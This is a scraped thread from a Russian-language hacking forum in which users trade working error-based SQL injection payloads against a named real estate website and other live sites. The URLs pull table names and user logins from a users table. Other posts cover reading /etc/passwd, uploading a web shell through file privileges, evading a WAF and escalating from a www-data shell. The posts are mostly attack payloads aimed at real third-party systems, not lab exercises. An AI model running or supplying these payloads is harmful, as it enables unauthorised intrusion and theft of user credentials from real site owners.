Имел ввиду круглые, а не знак больше/меньше. BigBear, пробовал - не проходит. Спасибо! Вдогонку спрошу: какие есть популярные WAF (или модули для joomla), которые режут все спец символы, но не трогают sql операторы. Хочу покопаться в исходниках.
Приветствую, Помогите раскрутить иньекцию Code: http://sochi-h ome.com/objects/novostroyki.html?types=1 На странице две запроса с инъекцией, один видимо с использованием Count(*) поэтому подобрать кол=во полей пеполучается, но есть еще MySQL error based injection method Через него из проги Havij получил ДБ и Таблицы Code: Current DB: urchenko_home Table found: blocks Table found: catalogcats Table found: catalogitems Table found: cats Table found: content Table found: forms Table found: formsdata Table found: formsfields Table found: general Table found: menu Table found: menus Table found: photos Table found: photositems Table found: poller Table found: poller_option Table found: poller_vote Table found: ratings Table found: responses Table found: users Но далее Havij идти не хочет и не выводит поля таблиц.
http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
Благодарю. Но у меня опять ЧП Code: http://sochi-ho me.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+login+from+urchenko_home.users+limit+0,1),floor(rand(0)*2))x+from+urchenko_home.users+group+by+x)a)+-- Выдает такое Subquery returns more than 1 row
http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+concat(mid(login,1,100))+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
Новый серв - новый вопрос. Есть уязвимость site.com/1.php?id=1' Удалось до этого залится на сайт и получить шелл, а по нему узнать полный путь до каталога: /home/1/online/site/htdocs/ , но к сожалению шелл сразу удалили При попытке чтения '/etc/passwd' - всё ок. При попытке чтения '/home/1/online/site/htdocs/robots.txt' - пустое место. Так и должно быть? Или я где-то намудрил? И можно ли как-нибудь залить шелл? (file_priv=Y)
имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением. Самое простое что получилось сделать, это выудить название таблиц из information_schema. Хотелось бы добраться до названий столбцов таблиц и самих значений.
Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова: Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.
видимо не хочет воспринимать знак комментария --, либо я что-то неправильно делаю. конструкция вида -36103 вызывает ощибку "Товар не найден!".
Чувствую я, что у вас в поиске скуля. Разделение по пробелу. Без пробела: 5*(SELECT 1 FROM information_schema.tables WHERE 1 or 1 group by mid(version() from rand(0) for 9e9) having min(0)) Duplicate entry 'version' for key 'group_key' Все стандартно. https://rdot.org/forum/showthread.php?t=245 https://rdot.org/forum/showthread.php?t=503
5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((SELECT ifnull(TABLE_NAME,0) FROM information_schema.tables LIMIT 1), floor(rand(0)*2)) having min(0))
такой вопрос, есть шелл. права www-data но консоль не работает, можно ли както залится на другие папки ? если да то в какую сторону копать?
